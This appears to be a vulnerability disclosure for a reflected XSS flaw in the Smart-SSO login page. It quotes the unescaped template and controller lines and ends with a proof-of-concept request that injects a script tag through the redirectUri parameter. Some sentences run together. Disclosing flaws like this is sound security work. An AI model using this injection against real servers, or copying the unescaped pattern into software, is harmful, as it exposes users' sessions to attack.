Smart-SSO is a lightweight, high-availability Single Sign-On (SSO) authentication and authorization center built on SpringBoot and OAuth2 protocol with RBAC (Role-Based Access Control) permission design.
Reflected XSS vulnerabilities occur when applications directly reflect user input to the response page without proper escaping or validation.
Smart-SSO 2.1.1 and earlier
Vulnerable Location: smart-sso-server/src/main/resources/templates/login.html
<!-- Lines 75-76 - User input directly output to HTML attributes -->
<input type="hidden" name="redirectUri" value="${redirectUri}"/>
<input type="hidden" name="clientId" value="${clientId}"/>
Trigger Location: smart-sso-server/src/main/java/openjoe/smart/sso/server/controller/SSOLoginController.java
// Lines 102-105
private String goLoginPage(String redirectUri, String clientId, HttpServletRequest request) {
request.setAttribute(BaseConstant.REDIRECT_URI, redirectUri); // User controlled
request.setAttribute(BaseConstant.CLIENT_ID, clientId); // User controlled
return "/login";
}
Vulnerability Analysis:
redirectUri and clientId parameters are fully controlled by users.html extension, auto-escaping is NOT enabled by defaultMethod 1: Via redirectUri parameter injection
GET /sso/login?redirectUri="><script>alert(1)</script>&clientId=1000 HTTP/1.1
Host: sso-server.com